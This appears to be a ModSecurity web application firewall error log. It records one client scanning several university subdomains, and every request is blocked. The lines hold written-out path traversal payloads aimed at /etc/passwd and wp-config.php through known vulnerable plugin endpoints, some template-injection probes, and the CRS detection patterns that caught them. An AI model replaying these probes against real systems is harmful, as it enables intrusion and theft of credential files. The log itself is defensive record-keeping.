[Tue Aug 29 11:39:05.718907 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAXbb@4AAAAL"]
[Tue Aug 29 11:39:05.985159 2023] [:error] [pid 1677] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12acCo-f0AAAaNDuoAAAAQ"]
[Tue Aug 29 11:39:06.025353 2023] [:error] [pid 1677] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12asCo-f0AAAaNDuwAAAAQ"]
[Tue Aug 29 11:39:06.536037 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcupkAAAAN"]
[Tue Aug 29 11:39:06.666875 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAXwLNoAAAAe"]
[Tue Aug 29 11:39:06.668250 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcup8AAAAN"]
[Tue Aug 29 11:39:07.052257 2023] [:error] [pid 1683] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaT-uIAAAAb"]
[Tue Aug 29 11:39:07.068673 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYWXbMAAAAF"]
[Tue Aug 29 11:39:07.291102 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaa-RQAAAAp"]
[Tue Aug 29 11:39:07.298754 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYWXbgAAAAF"]
[Tue Aug 29 11:39:07.317043 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYh9TQAAAAK"]
[Tue Aug 29 11:39:10.480121 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12bsCo-f0AAAXwLPEAAAAe"]
[Tue Aug 29 11:39:11.627588 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12b8Co-f0AAAXwLPYAAAAe"]
[Tue Aug 29 11:39:11.736836 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAIAAAAL"]
[Tue Aug 29 11:39:11.956327 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12b8Co-f0AAAXbcA0AAAAL"]
[Tue Aug 29 11:39:11.995256 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12b8Co-f0AAAYcursAAAAN"]
[Tue Aug 29 11:39:12.020567 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagEwgAAAAn"]
[Tue Aug 29 11:39:12.035793 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYcur0AAAAN"]
[Tue Aug 29 11:39:12.225405 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAagExIAAAAn"]
[Tue Aug 29 11:39:12.264858 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagExQAAAAn"]
[Tue Aug 29 11:39:12.434938 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaJJr0AAAAJ"]
[Tue Aug 29 11:39:12.435589 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAYlCOAAAAAP"]
[Tue Aug 29 11:39:12.455992 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaJJr4AAAAJ"]
[Tue Aug 29 11:39:12.467245 2023] [:error] [pid 1684] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaULdkAAAAh"]
[Tue Aug 29 11:39:12.478077 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAaJJr8AAAAJ"]
[Tue Aug 29 11:39:12.585416 2023] [:error] [pid 1691] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAab9TYAAAAV"]
[Tue Aug 29 11:39:13.120214 2023] [:error] [pid 1472] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAXA9oUAAAAO"]
[Tue Aug 29 11:39:13.229054 2023] [:error] [pid 1700] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAakQSwAAAAr"]
[Tue Aug 29 11:39:13.348289 2023] [:error] [pid 1702] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAamaooAAAAt"]
[Tue Aug 29 11:39:13.366956 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAagExoAAAAn"]
[Tue Aug 29 11:39:13.418333 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12ccCo-f0AAAaHMU4AAAAE"]
[Tue Aug 29 11:39:14.346622 2023] [:error] [pid 1679] [client 114.5.253.31] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "114.5.253.83_503e2fdc64254823cb9f81e3b3d879e8c6f416b6"): Internal error [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZO12ccCo-f0AAAaPj5oAAAAa"]
[Tue Aug 29 11:39:16.371620 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12dMCo-f0AAAafEtkAAAAW"]
[Tue Aug 29 11:39:16.375787 2023] [:error] [pid 1729] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12dMCo-f0AAAbB7tIAAAAu"]
[Tue Aug 29 11:39:16.382182 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12dMCo-f0AAAXQKDcAAAAj"]
[Tue Aug 29 11:39:16.396519 2023] [:error] [pid 1672] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12dMCo-f0AAAaIwwsAAAAH"]
[Tue Aug 29 11:39:18.690143 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAaW4J4AAAAk"]
[Tue Aug 29 11:39:18.698382 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: nuclei%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12dsCo-f0AAAXbcDAAAAAL"]
[Tue Aug 29 11:39:22.359222 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12esCo-f0AAAbo-YMAAAAi"]
[Tue Aug 29 11:39:22.372329 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO12esCo-f0AAAaa-V0AAAAp"]
[Tue Aug 29 11:39:23.531514 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAagEzoAAAAn"]
[Tue Aug 29 11:39:23.535505 2023] [:error] [pid 1701] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAalitAAAAAs"]
